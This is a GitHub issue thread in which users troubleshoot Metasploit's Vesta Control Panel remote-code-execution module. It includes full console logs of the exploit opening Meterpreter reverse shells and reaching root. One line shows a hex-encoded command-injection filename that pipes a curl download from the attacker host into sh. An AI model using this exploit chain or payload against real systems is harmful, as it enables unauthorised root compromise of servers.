Closed margo-gru closed 4 years ago
Everything is working as expected for me with msf5.
msf5 exploit(linux/http/vestacp_exec) > version
Framework: 5.0.89-dev-6034f48e8f
Console : 5.0.89-dev-6034f48e8f
msf5 exploit(linux/http/vestacp_exec) > options
Module options (exploit/linux/http/vestacp_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD mehmet yes The password to login with
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 192.168.74.218 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 8083 yes The target port (TCP)
SRVHOST 192.168.74.1 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT 8081 yes The local port to listen on.
SSL true no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
TARGETURI / yes The URI of the vulnerable instance
URIPATH no The URI to use for this exploit (default is random)
USERNAME mehmet yes The username to login as
VHOST no HTTP server virtual host
Payload options (python/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.74.1 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
msf5 exploit(linux/http/vestacp_exec) >
msf5 exploit(linux/http/vestacp_exec) > run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 192.168.74.1:4444
msf5 exploit(linux/http/vestacp_exec) > [*] 192.168.74.218:8083 - Using URL: http://192.168.74.1:8081/XOYCxA6tqHEoR
[*] 192.168.74.218:8083 - Second payload download URI is http://192.168.74.1:8081/XOYCxA6tqHEoR
[+] 192.168.74.218:21 - Successfully authenticated to the FTP service
[+] 192.168.74.218:21 - The file with the payload in the file name has been successfully uploaded.
[*] 192.168.74.218:8083 - Retrieving cookie and csrf token values
[+] 192.168.74.218:8083 - Cookie and CSRF token values successfully retrieved
[*] 192.168.74.218:8083 - Authenticating to HTTP Service with given credentials
[*] 192.168.74.218:8083 - Starting scheduled backup. Exploitation may take up to 5 minutes.
[+] 192.168.74.218:8083 - Scheduled backup has been started !
[*] 192.168.74.218:8083 - It seems there is an active backup process ! Recheck after 30
[*] 192.168.74.218:8083 - It seems there is an active backup process ! Recheck after 30 second. Zzzzzz...
[*] 192.168.74.218:8083 - It seems there is an active backup process ! Recheck after 30 second. Zzzzzz...
[*] 192.168.74.218:8083 - It seems there is an active backup process ! Recheck after 30 second. Zzzzzz...
[+] 192.168.74.218:8083 - First stage is executed ! Sending 2nd stage of the payload
[*] Sending stage (53755 bytes) to 192.168.74.218
[*] Meterpreter session 1 opened (192.168.74.1:4444 -> 192.168.74.218:34876) at 2020-05-14 16:55:32 +0300
msf5 exploit(linux/http/vestacp_exec) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > id
I am not sure these type of new modules are compatible with msf4 version that you are using.
Indeed, we did change a lot in the framework between MSF4 and MSF5. MSF4 is no longer supported and has not received any updates since around January/February of this year when we ceased development on it after having supported both MSF4 and MSF5 for several months. If you are still receiving the error on MSF5, then I'll be happy to look into this further, but for the moment this sounds like it could be a case of just using an outdated version of the Framework as @mmetince mentioned.
@gwillcox-r7 @mmetince ,Thank you. Okay, I'll Update the Metasploit framework and will see if it is working
Thank you @mmetince @gwillcox-r7 . IT WORKED! After updating to MSF5,exploit worked as expected.
Module options (exploit/linux/http/vestacp_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD KyoqTdqsak yes The password to login with
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 10.115.119.174 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 8083 yes The target port (TCP)
SRVHOST 10.113.199.116 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL true no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
TARGETURI / yes The URI of the vulnerable instance
URIPATH no The URI to use for this exploit (default is random)
USERNAME admin yes The username to login as
VHOST no HTTP server virtual host
Payload options (python/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 10.113.199.116 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
msf5 exploit(linux/http/vestacp_exec) > run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 10.113.199.116:4444
[*] 10.115.119.174:8083 - Using URL: http://10.113.199.116:8080/dDpSWt7nA
[*] 10.115.119.174:8083 - Second payload download URI is http://10.113.199.116:8080/dDpSWt7nA
msf5 exploit(linux/http/vestacp_exec) > [+] 10.115.119.174:21 - Successfully authenticated to the FTP service
[+] 10.115.119.174:21 - The file with the payload in the file name has been successfully uploaded.
[*] 10.115.119.174:8083 - Retrieving cookie and csrf token values
[+] 10.115.119.174:8083 - Cookie and CSRF token values successfully retrieved
[*] 10.115.119.174:8083 - Authenticating to HTTP Service with given credentials
[*] 10.115.119.174:8083 - Starting scheduled backup. Exploitation may take up to 5 minutes.
[+] 10.115.119.174:8083 - Scheduled backup has been started !
[*] 10.115.119.174:8083 - It seems there is an active backup process ! Recheck after 30 second. Zzzzzz...
[*] 10.115.119.174:8083 - It seems there is an active backup process ! Recheck after 30 second. Zzzzzz...
[*] 10.115.119.174:8083 - It seems there is an active backup process ! Recheck after 30 second. Zzzzzz...
[*] 10.115.119.174:8083 - It seems there is an active backup process ! Recheck after 30 second. Zzzzzz...
[*] 10.115.119.174:8083 - It seems there is an active backup process ! Recheck after 30 second. Zzzzzz...
[*] 10.115.119.174:8083 - It seems there is an active backup process ! Recheck after 30 second. Zzzzzz...
[*] 10.115.119.174:8083 - It seems there is an active backup process ! Recheck after 30 second. Zzzzzz...
[*] 10.115.119.174:8083 - It seems there is an active backup process ! Recheck after 30 second. Zzzzzz...
[*] 10.115.119.174:8083 - It seems there is an active backup process ! Recheck after 30 second. Zzzzzz...
[*] 10.115.119.174:8083 - It seems there is an active backup process ! Recheck after 30 second. Zzzzzz...
[+] 10.115.119.174:8083 - First stage is executed ! Sending 2nd stage of the payload
[*] Sending stage (53755 bytes) to 10.115.119.174
[*] Meterpreter session 1 opened (10.113.199.116:4444 -> 10.115.119.174:42070) at 2020-05-14 20:24:56 -0700
[+] 10.115.119.174:8083 - Deleted /home/admin/.a';$(perl${IFS}-e${IFS}'system(pack(qq,H102,,qq,6375726c202d73534c20687474703a2f2f31302e3131332e3139392e3131363a383038302f644470535774376e41207c207368,))');'
[+] 10.115.119.174:8083 - Deleted /usr/local/vesta/data/users/admin/backup.conf
[+] 10.115.119.174:8083 - Payload appears to have executed in the background. Enjoy the shells <3
msf5 exploit(linux/http/vestacp_exec) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > shell
Process 15126 created.
Channel 1 created.
sh: no job control in this shell
sh-4.2# id
uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:initrc_t:s0
I'm trying to exploit https://github.com/rapid7/metasploit-framework/pull/13094#issue-390484331 Exploit is for Vesta Control Panel Remote Code Execution 0day but I'm getting error while exploiting. Current configuration is Error is
Using Kali Linux, Metasploit version: Framework: 4.17.24-dev Console : 4.17.24-dev
Can you please help me with the error?